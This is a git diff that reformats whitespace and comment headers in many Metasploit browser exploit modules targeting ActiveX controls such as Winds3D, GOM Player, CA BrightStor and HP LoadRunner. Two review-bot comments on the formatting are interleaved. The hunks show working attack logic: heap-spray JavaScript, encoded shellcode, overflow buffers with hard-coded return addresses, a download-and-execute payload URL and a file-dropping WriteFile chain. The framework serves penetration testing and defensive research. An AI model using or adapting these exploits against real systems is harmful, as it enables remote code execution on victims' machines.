@@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote free condition using the Src, Background, PackageXml properties. }, 'License' => MSF_LICENSE, - 'Author' => + 'Author' => [ 'Elazar Broad ', # Original exploit [see References] 'Trancer ' # Metasploit implementation @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote # Randomize the javascript variable names idrop = rand_text_alpha(rand(100) + 1) j_function = rand_text_alpha(rand(100) + 1) - j_shellcode = rand_text_alpha(rand(100) + 1) + j_shellcode = rand_text_alpha(rand(100) + 1) j_nops = rand_text_alpha(rand(100) + 1) j_headersize = rand_text_alpha(rand(100) + 1) j_slackspace = rand_text_alpha(rand(100) + 1) 
diff --git a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb index 2c515169c4..3264b00428 100644 --- a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb +++ b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb @@ -39,9 +39,9 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'AwingSoft Winds3D Player SceneURL Buffer Overflow', 'Description' => %q{ This module exploits a data segment buffer overflow within Winds3D Viewer of - AwingSoft Awakening 3.x (WindsPly.ocx v3.6.0.0). This ActiveX is a plugin of + AwingSoft Awakening 3.x (WindsPly.ocx v3.6.0.0). This ActiveX is a plugin of AwingSoft Web3D Player. - By setting an overly long value to the 'SceneURL' property, an attacker can + By setting an overly long value to the 'SceneURL' property, an attacker can overrun a buffer and execute arbitrary code. }, 'License' => MSF_LICENSE, @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Payload' => { 'Space' => 1024, - 'BadChars' => "\x00\x09\x0a\x0d'\\", + 'BadChars' => "\x00\x09\x0a\x0d'\\", 'StackAdjustment' => -3500 }, 'Platform' => 'win', @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote blocksize = 0x40000 fillto = 500 offset = target['Offset'] - + # Randomize the javascript variable names winds3d = rand_text_alpha(rand(100) + 1) j_shellcode = rand_text_alpha(rand(100) + 1) @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote j_block = rand_text_alpha(rand(100) + 1) j_memory = rand_text_alpha(rand(100) + 1) j_counter = rand_text_alpha(rand(30) + 2) - + # we must leave the page, so we use http-equiv and javascript refresh methods html = %Q| 
@@ -125,12 +125,10 @@ while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_b for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode}; var #{j_ret} = unescape('#{ret}'); -while (#{j_ret}.length <= #{offset}) { - #{j_ret} = #{j_ret} + unescape('#{ret}'); -} +while (#{j_ret}.length <= #{offset}) { #{j_ret} = #{j_ret} + unescape('#{ret}'); } #{winds3d}.SceneURL = #{j_ret}; setTimeout('window.location = "#{get_resource}";', 500); - + | diff --git a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb index e54af6b6b9..135432435b 100644 --- a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb +++ b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb @@ -15,15 +15,15 @@ class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML - + def initialize(info = {}) super(update_info(info, 'Name' => 'AwingSoft Winds3D Player 3.5 SceneURL Download and Execute', 'Description' => %q{ This module exploits an untrusted program execution vulnerability within the Winds3D Player from AwingSoft. The Winds3D Player is a browser plugin for - IE (ActiveX), Opera (DLL) and Firefox (XPI). By setting the 'SceneURL' - parameter to the URL to an executable, an attacker can execute arbitrary + IE (ActiveX), Opera (DLL) and Firefox (XPI). By setting the 'SceneURL' + parameter to the URL to an executable, an attacker can execute arbitrary code. Testing was conducted using plugin version 3.5.0.9 for Firefox 3.5 and @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_request_uri(cli, request) - + payload_url = "http://" payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload" 
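Review bot: The rewrite of the `while` loop inside the `html` heredoc at `@@ -125,12 +125,10` changes the JavaScript the module serves to the client, not just Ruby source whitespace: three lines become `while (#{j_ret}.length <= #{offset}) { #{j_ret} = #{j_ret} + unescape('#{ret}'); }`. The result is functionally equivalent because the loop body is a single statement, but a content change buried in a trailing-whitespace sweep is easy to miss in review and deserves its own commit or at least a mention in the commit message. If keeping the served page compact was the intent, a comment such as `# single-line loop: keeps the served JS small` above the heredoc would record that. The enclosing method starts outside the hunk.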
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote data = Msf::Util::EXE.to_win32pe(framework,p.encoded) print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) - + # Handle the payload # handler(cli) return @@ -73,13 +73,13 @@ class Metasploit3 < Msf::Exploit::Remote # otherwise, send the html.. html = %Q| - - - + + + | - + print_status("Sending #{self.name} HTML to #{cli.peerhost}:#{cli.peerport}...") # Transmit the compressed response to the client send_response(cli, html, { 'Content-Type' => 'text/html' }) diff --git a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb index d23380b92e..bd6bbb838c 100644 --- a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb +++ b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb @@ -86,15 +86,15 @@ class Metasploit3 < Msf::Exploit::Remote # Generate the final javascript js = %Q| try { - var vulnerable = new ActiveXObject('#{progid}'); - var my_unescape = unescape; - var shellcode = '#{shellcode}'; - #{js_heap_spray} - sprayHeap(my_unescape(shellcode), #{spray_num}, 0x40000); - var evil_string = ''; - while (evil_string.length < 4150) - evil_string += my_unescape('#{spray_str}'); - vulnerable.OnBeforeVideoDownload(evil_string); +var vulnerable = new ActiveXObject('#{progid}'); +var my_unescape = unescape; +var shellcode = '#{shellcode}'; +#{js_heap_spray} +sprayHeap(my_unescape(shellcode), #{spray_num}, 0x40000); +var evil_string = ''; +while (evil_string.length < 4150) +evil_string += my_unescape('#{spray_str}'); +vulnerable.OnBeforeVideoDownload(evil_string); } catch( e ) { window.location = 'about:blank' ; } | diff --git a/modules/exploits/windows/browser/barcode_ax49.rb b/modules/exploits/windows/browser/barcode_ax49.rb index f959394a97..7f0dc5a90d 100644 
--- a/modules/exploits/windows/browser/barcode_ax49.rb +++ b/modules/exploits/windows/browser/barcode_ax49.rb @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote method of BarCodeAx.dll v4.9, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'Trancek ', 'patrick' ], + 'Author' => [ 'Trancek ', 'patrick' ], 'Version' => '$Revision$', 'References' => [ @@ -71,14 +71,13 @@ class Metasploit3 < Msf::Exploit::Remote buff = Rex::Text.rand_text_alphanumeric(656) + [target['Ret']].pack('V') + make_nops(20) + payload.encoded # Build out the message - content = %Q| - - - - - | + content = %Q| + + + +| print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") diff --git a/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb b/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb index f41c672cf6..1424ac21d1 100644 --- a/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb +++ b/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb @@ -1,9 +1,13 @@ -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/framework/ -### +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## require 'msf/core' 
@@ -16,14 +20,14 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow', 'Description' => %q{ - The CA BrightStor ARCserve Backup ActiveX control (ListCtrl.ocx) is vulnerable to a stack-based - buffer overflow. By passing an overly long argument to the AddColumn() method, a remote attacker - could overflow a buffer and execute arbitrary code on the system. + The CA BrightStor ARCserve Backup ActiveX control (ListCtrl.ocx) is vulnerable to a stack-based + buffer overflow. By passing an overly long argument to the AddColumn() method, a remote attacker + could overflow a buffer and execute arbitrary code on the system. }, 'License' => MSF_LICENSE, - 'Author' => [ 'dean ' ], + 'Author' => [ 'dean ' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2008-1472' ], [ 'OSVDB', '43214' ], @@ -40,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP2-SP3 IE 6.0/7.0', { 'Ret' => 0x0A0A0A0A } ] + [ 'Windows XP SP2-SP3 IE 6.0/7.0', { 'Ret' => 0x0A0A0A0A } ] ], 'DisclosureDate' => 'March 16 2008', 'DefaultTarget' => 0)) @@ -77,26 +81,26 @@ class Metasploit3 < Msf::Exploit::Remote rand5 = rand_text_alpha(rand(100) + 1) rand6 = rand_text_alpha(rand(100) + 1) rand7 = rand_text_alpha(rand(100) + 1) - + content = %Q| @@ -108,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb index 420cb8a6f2..0516c79ee8 100644 --- a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb +++ b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb 
@@ -93,17 +93,17 @@ compatUI.RunApplication 1, "#{exe_path}", 1 js = %Q| function #{fnname}() { - var my_unescape = unescape; - var obj = new ActiveXObject("ChilkatCrypt2.ChilkatCrypt2"); - var exe_path = "#{exe_path}"; - var exe_str = "#{exe_str}"; - var exe_data = my_unescape(exe_str); - obj.WriteFile(exe_path, exe_data); - var hcp_str = "#{hcp_str}"; - var hcp_data = my_unescape(hcp_str); - var hcp_path = "#{hcp_path}"; - obj.WriteFile(hcp_path, hcp_data); - window.location = "#{hcp_url}"; +var my_unescape = unescape; +var obj = new ActiveXObject("ChilkatCrypt2.ChilkatCrypt2"); +var exe_path = "#{exe_path}"; +var exe_str = "#{exe_str}"; +var exe_data = my_unescape(exe_str); +obj.WriteFile(exe_path, exe_data); +var hcp_str = "#{hcp_str}"; +var hcp_data = my_unescape(hcp_str); +var hcp_path = "#{hcp_path}"; +obj.WriteFile(hcp_path, hcp_data); +window.location = "#{hcp_url}"; } | diff --git a/modules/exploits/windows/browser/creative_software_cachefolder.rb b/modules/exploits/windows/browser/creative_software_cachefolder.rb index 3a116167d6..eea8ae7047 100644 --- a/modules/exploits/windows/browser/creative_software_cachefolder.rb +++ b/modules/exploits/windows/browser/creative_software_cachefolder.rb @@ -1,18 +1,16 @@ ## -## $Id: creative_software_cachefolder.rb -### - -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/framework/ -### +# $Id$ +## +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking 
@@ -22,14 +20,14 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Creative Software AutoUpdate Engine. When - sending an overly long string to the cachefolder() property of CTSUEng.ocx + This module exploits a stack overflow in Creative Software AutoUpdate Engine. When + sending an overly long string to the cachefolder() property of CTSUEng.ocx an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC', ], + 'Author' => [ 'MC', ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2008-0955' ], [ 'OSVDB', '45655' ], @@ -46,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ] + [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ] ], 'DisclosureDate' => 'May 28 2008', 'DefaultTarget' => 0)) @@ -80,34 +78,34 @@ class Metasploit3 < Msf::Exploit::Remote rand8 = rand_text_alpha(rand(100) + 1) content = %Q| - - - - - | + + + + + | # Randomize the whitespace in the document content = Rex::Text.randomize_space(content) - + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/dxstudio_player_exec.rb b/modules/exploits/windows/browser/dxstudio_player_exec.rb index fe043cfa0c..fb65ef4faf 100644 --- a/modules/exploits/windows/browser/dxstudio_player_exec.rb +++ b/modules/exploits/windows/browser/dxstudio_player_exec.rb 
@@ -24,13 +24,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Description' => %q{ This module exploits a command execution vulnerability within the DX Studio Player from Worldweaver. The player is a browser plugin for - IE (ActiveX) and Firefox (dll). When an unsuspecting user visits a web + IE (ActiveX) and Firefox (dll). When an unsuspecting user visits a web page referring to a specially crafted .dxstudio document, an attacker can execute arbitrary commands. Testing was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20 and IE 6 on Windows XP SP3. In IE, the user will be prompted if they wish to allow - the plug-in to access local files. This prompt appears to occur only once per + the plug-in to access local files. This prompt appears to occur only once per server host. NOTE: This exploit uses additionally dangerous script features to write to @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote cmds = generate_cmdstager({}, 2047, p) scr = "" cmds.each { |ln| - scr << " f.writeString('" + scr << "f.writeString('" scr << ln scr << "\\n');\n" } @@ -89,11 +89,11 @@ class Metasploit3 < Msf::Exploit::Remote @@ -109,7 +109,7 @@ CMDS print_status("Sending file.dxstudio payload to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) - + # Handle the payload # handler(cli) return @@ -122,9 +122,9 @@ CMDS Please wait... - - - + + + @@ -140,6 +140,6 @@ end =begin TODO: - - make it more quiet - - auto-migrate? +- make it more quiet +- auto-migrate? =end diff --git a/modules/exploits/windows/browser/ea_checkrequirements.rb b/modules/exploits/windows/browser/ea_checkrequirements.rb index ae5b60b576..e66d877570 100644 --- a/modules/exploits/windows/browser/ea_checkrequirements.rb +++ b/modules/exploits/windows/browser/ea_checkrequirements.rb 
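Review bot: The change at `scr << "f.writeString('"` in hunk `@@ -79,7 +79,7` edits a string literal rather than source layout, so it alters the .dxstudio script the module emits; the dropped leading space is presumably insignificant to that interpreter, but a whitespace sweep that reaches inside literals should be checked by hand rather than applied blindly. While here, note that each stager line `ln` is spliced between single quotes with no escaping (`scr << ln` followed by `scr << "\\n');\n"`), so a line containing `'` or `\` would break the generated script; the cmdstager output presumably avoids those characters, and a comment such as `# stager lines are spliced unescaped into writeString('...'); they must not contain ' or \` would make that assumption explicit. The `cmds.each` block is complete within the hunk, but the method around it starts and ends outside it.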
@@ -1,9 +1,13 @@ -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/projects/Framework/ -### +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## require 'msf/core' @@ -17,14 +21,14 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Electronic Arts SnoopyCtrl - ActiveX Control (NPSnpy.dll 1.1.0.36. When sending a overly long - string to the CheckRequirements() method, an attacker may be able - to execute arbitrary code. + ActiveX Control (NPSnpy.dll 1.1.0.36. When sending a overly long + string to the CheckRequirements() method, an attacker may be able + to execute arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], + 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2007-4466' ], ], @@ -40,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ] + [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ] ], 'DisclosureDate' => 'Oct 8 2007', 'DefaultTarget' => 0)) @@ -60,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote # Encode the shellcode. shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - + ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, "or al, 12").encode_string * 2) js = %Q| 
@@ -82,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote opts = { 'Strings' => true, 'Symbols' => { - 'Variables' => [ + 'Variables' => [ 'vulnerable', 'shellcode', 'my_unescape', @@ -94,21 +98,20 @@ class Metasploit3 < Msf::Exploit::Remote js = ::Rex::Exploitation::ObfuscateJS.new(js, opts) js.update_opts(js_heap_spray.opts) js.obfuscate() - content = %Q| - - - - - - | + content = %Q| + + + + +| print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb index fa186a3999..440dbbf6be 100644 --- a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb +++ b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb @@ -20,15 +20,15 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'FlipViewer FViewerLoading ActiveX Control Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in E-BOOK Systems FlipViewer 4.0. - The vulnerability is caused due to a boundary error in the + This module exploits a stack overflow in E-BOOK Systems FlipViewer 4.0. + The vulnerability is caused due to a boundary error in the FViewerLoading (FlipViewerX.dll) ActiveX control when handling the "LoadOpf()" method. }, 'License' => BSD_LICENSE, - 'Author' => [ 'LSO ' ], + 'Author' => [ 'LSO ' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2007-2919' ], [ 'OSVDB', '37042' ], 
@@ -65,42 +65,41 @@ class Metasploit3 < Msf::Exploit::Remote return if ((p = regenerate_payload(cli)) == nil) shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - + nops = Rex::Text.to_unescape(make_nops(4)) ret = Rex::Text.uri_encode([target.ret].pack('L')) - vname = rand_text_alpha(rand(100) + 1) - var_i = rand_text_alpha(rand(30) + 2) - rand1 = rand_text_alpha(rand(100) + 1) - rand2 = rand_text_alpha(rand(100) + 1) - rand3 = rand_text_alpha(rand(100) + 1) - rand4 = rand_text_alpha(rand(100) + 1) - rand5 = rand_text_alpha(rand(100) + 1) - rand6 = rand_text_alpha(rand(100) + 1) - rand7 = rand_text_alpha(rand(100) + 1) - rand8 = rand_text_alpha(rand(100) + 1) - - content = %Q| - - - - - | + vname = rand_text_alpha(rand(100) + 1) + var_i = rand_text_alpha(rand(30) + 2) + rand1 = rand_text_alpha(rand(100) + 1) + rand2 = rand_text_alpha(rand(100) + 1) + rand3 = rand_text_alpha(rand(100) + 1) + rand4 = rand_text_alpha(rand(100) + 1) + rand5 = rand_text_alpha(rand(100) + 1) + rand6 = rand_text_alpha(rand(100) + 1) + rand7 = rand_text_alpha(rand(100) + 1) + rand8 = rand_text_alpha(rand(100) + 1) + + content = %Q| + + + +| content = Rex::Text.randomize_space(content) diff --git a/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb b/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb index ab108b560d..f479957539 100644 --- a/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb +++ b/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb @@ -11,7 +11,6 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking 
@@ -21,15 +20,15 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'EnjoySAP SAP GUI ActiveX Control Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in SAP KWEdit ActiveX + This module exploits a stack overflow in SAP KWEdit ActiveX Control (kwedit.dll 6400.1.1.41) provided by EnjoySAP GUI. By sending - an overly long string to the "PrepareToPostHTML()" method, an attacker + an overly long string to the "PrepareToPostHTML()" method, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], + 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2007-3605' ], [ 'OSVDB', '37690' ], @@ -49,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Targets' => [ [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], - [ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ], + [ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ], ], 'DisclosureDate' => 'July 05 2007', @@ -71,27 +70,26 @@ class Metasploit3 < Msf::Exploit::Remote # Randomize some things vname = rand_text_alpha(rand(100) + 1) strname = rand_text_alpha(rand(100) + 1) - + # Build the exploit buffer - sploit = rand_text_alpha(1036) + Rex::Arch::X86.jmp_short(6) - sploit << make_nops(2) + [target.ret].pack('V') + p.encoded + sploit = rand_text_alpha(1036) + Rex::Arch::X86.jmp_short(6) + sploit << make_nops(2) + [target.ret].pack('V') + p.encoded # Build out the message - content = %Q| - - - - - | - + content = %Q| + + + +| + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/facebook_extractiptc.rb b/modules/exploits/windows/browser/facebook_extractiptc.rb index 13071f07e3..6588e2a187 100644 --- a/modules/exploits/windows/browser/facebook_extractiptc.rb 
+++ b/modules/exploits/windows/browser/facebook_extractiptc.rb @@ -11,7 +11,6 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -21,15 +20,15 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Facebook Photo Uploader 4 ActiveX Control Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Facebook Photo Uploader 4. - By sending an overly long string to the "ExtractIptc()" property located - in the ImageUploader4.ocx (4.5.57.0) Control, an attacker may be able to execute - arbitrary code. + This module exploits a stack overflow in Facebook Photo Uploader 4. + By sending an overly long string to the "ExtractIptc()" property located + in the ImageUploader4.ocx (4.5.57.0) Control, an attacker may be able to execute + arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], + 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2008-5711' ], [ 'OSVDB', '41073' ], @@ -49,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'IE 6 SP0-SP2 / Windows XP SP2 Pro English', { 'Ret' => 0x74c9de3e } ], # 02/07/08 + [ 'IE 6 SP0-SP2 / Windows XP SP2 Pro English', { 'Ret' => 0x74c9de3e } ], # 02/07/08 ], # ./msfpescan -i /tmp/oleacc.dll | grep SEHandler 'DisclosureDate' => 'Jan 31 2008', 'DefaultTarget' => 0)) @@ -74,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote rand2 = rand_text_alpha(rand(100) + 1) rand3 = rand_text_alpha(rand(100) + 1) rand4 = rand_text_alpha(rand(100) + 1) - + # Set the exploit buffer filler = Rex::Text.to_unescape(rand_text_alpha(2)) jmp = Rex::Text.to_unescape([0x969606eb].pack('V')) 
@@ -82,26 +81,25 @@ class Metasploit3 < Msf::Exploit::Remote sc = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # Build out the message - content = %Q| - - - - - | - + content = %Q| + + + +| + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/gom_openurl.rb b/modules/exploits/windows/browser/gom_openurl.rb index 18665ab5f7..3b82127974 100644 --- a/modules/exploits/windows/browser/gom_openurl.rb +++ b/modules/exploits/windows/browser/gom_openurl.rb @@ -11,7 +11,6 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -21,15 +20,15 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'GOM Player ActiveX Control Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in GOM Player 2.1.6.3499. - By sending an overly long string to the "OpenUrl()" method located - in the GomWeb3.dll Control, an attacker may be able to execute - arbitrary code. + This module exploits a stack overflow in GOM Player 2.1.6.3499. + By sending an overly long string to the "OpenUrl()" method located + in the GomWeb3.dll Control, an attacker may be able to execute + arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], + 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2007-5779'], [ 'OSVDB', '38282'], @@ -69,11 +68,11 @@ class Metasploit3 < Msf::Exploit::Remote # Randomize some things vname = rand_text_alpha(rand(100) + 1) strname = rand_text_alpha(rand(100) + 1) - - # Set the exploit buffer - sploit = rand_text_english(506) + [target.ret].pack('V') + + # Set the exploit buffer + sploit = rand_text_english(506) + [target.ret].pack('V') sploit << p.encoded + rand_text_english(1024 - p.encoded.length) - + # Build out the message content = %Q| 
@@ -84,13 +83,13 @@ class Metasploit3 < Msf::Exploit::Remote #{vname}.OpenURL(#{strname}); - | - + | + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/hp_loadrunner_addfile.rb b/modules/exploits/windows/browser/hp_loadrunner_addfile.rb index 0deec7d2a9..026d09bdc2 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_addfile.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_addfile.rb @@ -11,7 +11,6 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -23,14 +22,14 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Persits XUpload ActiveX AddFile Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Persits Software Inc's - XUpload ActiveX control(version 3.0.0.3) thats included in HP LoadRunner 9.5. - By passing an overly long string to the AddFile method, an attacker may be - able to execute arbitrary code. + XUpload ActiveX control(version 3.0.0.3) thats included in HP LoadRunner 9.5. + By passing an overly long string to the AddFile method, an attacker may be + able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2008-0492'], [ 'OSVDB', '40762'], @@ -83,14 +82,14 @@ class Metasploit3 < Msf::Exploit::Remote sploit << p.encoded sploit << rand_text(1000) * 25 sploit = Rex::Text.to_unescape(sploit) - + # Build out the message content = %Q| @@ -98,12 +97,12 @@ function check() | - + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end 
diff --git a/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb b/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb index a4ca89540e..678e49e481 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb @@ -11,7 +11,6 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking @@ -22,14 +21,14 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Persits Software Inc's - XUpload ActiveX control(version 2.1.0.1) thats included in HP LoadRunner 9.0. - By passing an overly long string to the AddFolder method, an attacker may be - able to execute arbitrary code. + XUpload ActiveX control(version 2.1.0.1) thats included in HP LoadRunner 9.0. + By passing an overly long string to the AddFolder method, an attacker may be + able to execute arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], + 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2007-6530'], [ 'OSVDB', '39901'], @@ -49,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP2 Pro English / IE6SP0-SP2', { 'Offset' => 1388, 'Ret' => 0x323ad95f } ], # PocoNet.dll + [ 'Windows XP SP2 Pro English / IE6SP0-SP2', { 'Offset' => 1388, 'Ret' => 0x323ad95f } ], # 